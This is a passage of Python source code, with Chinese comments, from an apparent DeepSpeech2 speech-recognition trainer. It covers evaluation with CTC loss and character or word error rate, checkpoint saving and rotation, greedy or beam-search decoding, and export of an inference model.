optimizer=optimizer, epoch=epoch, error_type=self.metrics_type, error_rate=c, test_loss=l, best_model=True)
# 保存模型
if nranks > 1:
self.save_model(save_model_path=save_model_path, use_model=self.use_model, epoch=epoch,
model=model.module, error_type=self.metrics_type, error_rate=c, test_loss=l, optimizer=optimizer)
else:
self.save_model(save_model_path=save_model_path, use_model=self.use_model, epoch=epoch,
model=model, error_type=self.metrics_type, error_rate=c, test_loss=l, optimizer=optimizer)
scheduler.step()
except KeyboardInterrupt:
# Ctrl+C退出时保存模型
if local_rank == 0:
print('请等一下,正在保存模型...')
if nranks > 1:
self.save_model(save_model_path=save_model_path, use_model=self.use_model, epoch=epoch,
model=model.module, optimizer=optimizer)
else:
self.save_model(save_model_path=save_model_path, use_model=self.use_model, epoch=epoch,
model=model, optimizer=optimizer)
# 评估模型
@torch.no_grad()
def __test(self, model, test_loader, vocabulary, ctc_loss):
cer_result, test_loss = [], []
for batch_id, (inputs, labels, input_lens, label_lens) in enumerate(test_loader):
inputs = inputs.cuda()
labels = labels.cuda()
# 执行识别
outs, out_lens, _ = model(inputs, input_lens)
out = outs.permute(1, 0, 2)
# 计算损失
loss = ctc_loss(out.log_softmax(2), labels, out_lens, label_lens)
loss = loss.mean().cpu().detach().numpy()
test_loss.append(loss)
# 解码获取识别结果
outs = torch.nn.functional.softmax(outs, 2)
outs = outs.cpu().detach().numpy()
out_strings = self.decoder_result(outs, out_lens, vocabulary)
labels_str = labels_to_string(labels.cpu().detach().numpy(), vocabulary)
cer_batch = []
for out_string, label in zip(*(out_strings, labels_str)):
# 计算字错率或者词错率
if self.metrics_type == 'wer':
c = wer(out_string, label)
else:
c = cer(out_string, label)
cer_result.append(c)
cer_batch.append(c)
if batch_id % 10 == 0:
print('[{}] Test batch: [{}/{}], loss: {:.5f}, '
'{}: {:.5f}'.format(datetime.now(), batch_id, len(test_loader),loss,self.metrics_type,
float(sum(cer_batch) / len(cer_batch))))
cer_result = float(sum(cer_result) / len(cer_result))
test_loss = float(sum(test_loss) / len(test_loss))
return cer_result, test_loss
# 保存模型
@staticmethod
def save_model(save_model_path, use_model, epoch, model, optimizer, error_type='cer', error_rate=-1., test_loss=-1., best_model=False):
if not best_model:
model_path = os.path.join(save_model_path, use_model, 'epoch_{}'.format(epoch))
os.makedirs(model_path, exist_ok=True)
torch.save(optimizer.state_dict(), os.path.join(model_path, 'optimizer.pt'))
torch.save(model.state_dict(), os.path.join(model_path, 'model.pt'))
with open(os.path.join(model_path, 'model.state'), 'w', encoding='utf-8') as f:
f.write('{"last_epoch": %d, "test_%s": %f, "test_loss": %f}' % (epoch, error_type, error_rate, test_loss))
last_model_path = os.path.join(save_model_path, use_model, 'last_model')
shutil.rmtree(last_model_path, ignore_errors=True)
shutil.copytree(model_path, last_model_path)
# 删除旧的模型
old_model_path = os.path.join(save_model_path, use_model, 'epoch_{}'.format(epoch - 3))
if os.path.exists(old_model_path):
shutil.rmtree(old_model_path)
else:
model_path = os.path.join(save_model_path, use_model, 'best_model')
os.makedirs(model_path, exist_ok=True)
torch.save(model.state_dict(), os.path.join(model_path, 'model.pt'))
torch.save(optimizer.state_dict(), os.path.join(model_path, 'optimizer.pt'))
with open(os.path.join(model_path, 'model.state'), 'w', encoding='utf-8') as f:
f.write('{"last_epoch": %d, "test_%s": %f, "test_loss": %f}' % (epoch, error_type, error_rate, test_loss))
print('[{}] 已保存模型:{}'.format(datetime.now(), model_path))
def decoder_result(self, outs, outs_lens, vocabulary):
# 集束搜索方法的处理
if self.decoder == "ctc_beam_search" and self.beam_search_decoder is None:
try:
from masr.decoders.beam_search_decoder import BeamSearchDecoder
self.beam_search_decoder = BeamSearchDecoder(self.alpha, self.beta, self.lang_model_path, vocabulary)
except ModuleNotFoundError:
print('\n==================================================================', file=sys.stderr)
print('缺少 paddlespeech-ctcdecoders 库,请根据文档安装,如果是Windows系统,只能使用ctc_greedy。', file=sys.stderr)
print('【注意】已自动切换为ctc_greedy解码器。', file=sys.stderr)
print('==================================================================\n', file=sys.stderr)
self.decoder = 'ctc_greedy'
# 执行解码
outs = [outs[i, :l, :] for i, l in enumerate(outs_lens)]
if self.decoder == 'ctc_greedy':
result = greedy_decoder_batch(outs, vocabulary)
else:
result = self.beam_search_decoder.decode_batch_beam_search(probs_split=outs,
beam_alpha=self.alpha,
beam_beta=self.beta,
beam_size=self.beam_size,
cutoff_prob=self.cutoff_prob,
cutoff_top_n=self.cutoff_top_n,
vocab_list=vocabulary,
num_processes=self.num_proc_bsearch)
return result
def export(self, save_model_path='models/', resume_model='models/deepspeech2/best_model/'):
"""
导出预测模型
:param save_model_path: 模型保存的路径
:param resume_model: 准备转换的模型路径
:return:
"""
# 获取训练数据
audio_featurizer = AudioFeaturizer(feature_method=self.feature_method)
text_featurizer = TextFeaturizer(self.dataset_vocab)
featureNormalizer = FeatureNormalizer(mean_std_filepath=self.mean_std_path, feature_method=self.feature_method)
# 获取模型
if self.use_model == 'deepspeech2':
base_model = DeepSpeech2Model(feat_size=audio_featurizer.feature_dim, vocab_size=text_featurizer.vocab_size)
else:
raise Exception('没有该模型:{}'.format(self.use_model))
# 加载预训练模型
resume_model_path = os.path.join(resume_model, 'model.pt')
assert os.path.exists(resume_model_path), "恢复模型不存在!"
base_model.load_state_dict(torch.load(resume_model_path))
print('[{}] 成功恢复模型参数和优化方法参数:{}'.format(datetime.now(), resume_model_path))
base_model.to('cuda')
mean = torch.from_numpy(featureNormalizer.mean).float().cuda()
std = torch.from_numpy(featureNormalizer.std).float().cuda()
# 获取模型
if self.use_model == 'deepspeech2':
model = DeepSpeech2ModelExport(model=base_model, feature_mean=mean, feature_std=std)
else:
raise Exception('没有该模型:{}'.format(self.use_model))
infer_model_dir = os.path.join(save_model_path, self.use_model)
os.makedirs(infer_model_dir, exist_ok=True)
infer_model_path = os.path.join(infer_model_dir, 'inference.pt')
# script_model = torch.jit.trace(model, (torch.rand((1, audio_featurizer.feature_dim, 300)),
# torch.randint(high=100, size=(1,), dtype=torch.int32),
# torch.rand(size=(base_model.num_rnn_layers, 1, base_model.rnn_size),
# dtype=torch.float32)))
# torch.jit.save(script_model, infer_model_path)
torch.save(model, infer_model_path)
print("预测模型已保存:{}".format(infer_model_path))
``` |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.